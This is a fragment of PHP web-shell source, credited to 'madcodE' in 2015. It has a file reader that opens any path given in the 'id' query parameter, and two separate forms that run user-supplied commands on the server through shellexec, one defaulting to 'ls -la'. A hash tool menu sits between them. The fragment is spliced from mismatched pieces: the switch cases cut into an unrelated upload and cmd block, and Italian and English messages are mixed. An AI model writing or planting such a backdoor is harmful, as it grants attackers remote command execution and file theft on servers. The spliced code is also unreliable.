$id = $_GET['id'];
$fp = fopen($id, "r");
$read = fread($fp, filesize($id));
print "<table border = '1'>\n<tr>\n<td>\n<pre>" . htmlentities($read) . "</pre></td>\n</tr>\n</table>\n";
fclose($fp);
break;
}
break;
case "execute":
$command = $_POST['command'];
if (!isset($_POST['command'])) {
print "<table>\n<form action = '" . $c . "&mode=execute' method = 'POST'>\n";
print "<tr>\n<td><input type = 'text' name = 'command'></td>\n</tr>\n";
print "<tr>\n<td><input type = 'submit' value = 'Execute'></td>\n</tr>\n</form>\n</table>";
} else {
$ret = shellexec($command);
if ($ret == "") {
print "Il comando non puo' essere eseguito sul server<br /><br /><br />\n";
} else {
print "Executing the following command:<br />\n";
print "<textarea rows = '5' cols = '60'>" . $command . "</textarea><br />\n";
print "Result:<br /> <textarea rows = '5' cols = '60'>" . $ret . "</textarea><br /><br /><br />\n";
}
}
break;
case "hasher":
print "<table>\n<form action = '" . $c . "&mode=hasher' method = 'POST'>\n";
print "<tr>\n<td><input type = 'text' name = 'hash'></td>\n</tr>\n";
print "<tr>\n<td><select name = 'type'>\n";
print "<option>md4</option>\n";
print "<option>md5</option>\n";
# if fails to write.
echo "<span id='error'>Error uploading file. </span>";
}
}
}
/**
check if user call for command execution
@author Ahsan Shabbir
**/
if ($action == "cmd") {
if (!isset($_POST['cmd'])) {
#Set default command if no command is set.
$cmd = "ls -la";
} else {
$cmd = $_POST['cmd'];
}
# display result in preformatted text
echo "<pre>" . shellexec($cmd) . "</pre>";
}
?>
</div>
<br>
<div id="shadow">
<?php
echo $title;
?>
coded by madcodE © 2015
</div>
</html>
